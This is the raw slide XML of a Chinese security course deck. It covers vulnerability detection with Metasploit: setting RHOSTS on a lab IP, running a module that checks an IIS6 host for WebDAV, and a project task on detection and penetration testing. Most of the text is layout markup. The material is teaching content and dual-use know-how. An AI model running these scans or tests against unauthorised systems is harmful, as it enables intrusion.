                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="文本框 140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5326380" y="988377"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>根据回显的信息发现，只需要配置RHOSTS参数，使用“set RHOSTS 192.168.172.129”命令配置好参数，如图2-4-52所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5326380" y="1910397"/>
            <a:ext cx="5276850" cy="466725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="文本框 141"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5326380" y="2377122"/>
            <a:ext cx="5080000" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-52 设置参数5.使用“run”或者“exploit”命令运行模块进行扫描，如图2-4-53所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5326380" y="3853497"/>
            <a:ext cx="5276850" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="文本框 142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5326380" y="4767897"/>
            <a:ext cx="5080000" cy="2030095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-53 运行模块        根据检测结果可以发现，目标主机的IIS6服务关闭了WebDAV服务。这样做是正确的，可以有效防护对IIS服务的恶意攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786245" y="6761480"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2174875" y="2546985"/>
            <a:ext cx="7373620" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用Metasploit工具对主机进行漏洞检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.使用Metasploit工具对主机进行渗透测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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a:xfrm>
            <a:off x="533756" y="1971129"/>
            <a:ext cx="4302496" cy="521035"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="4302496" cy="521035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7274400" y="1887541"/>
              <a:ext cx="1402080" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生自评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="3513239"/>
            <a:ext cx="4302496" cy="524299"/>
            <a:chOff x="6627851" y="3492048"/>
            <a:chExt cx="4302496" cy="524597"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3709766"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3492048"/>
              <a:ext cx="1402080" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生互评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="562331" y="4955527"/>
            <a:ext cx="4302496" cy="525366"/>
            <a:chOff x="6627851" y="5163977"/>
            <a:chExt cx="4302496" cy="525665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形: 圆角 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="5163977"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
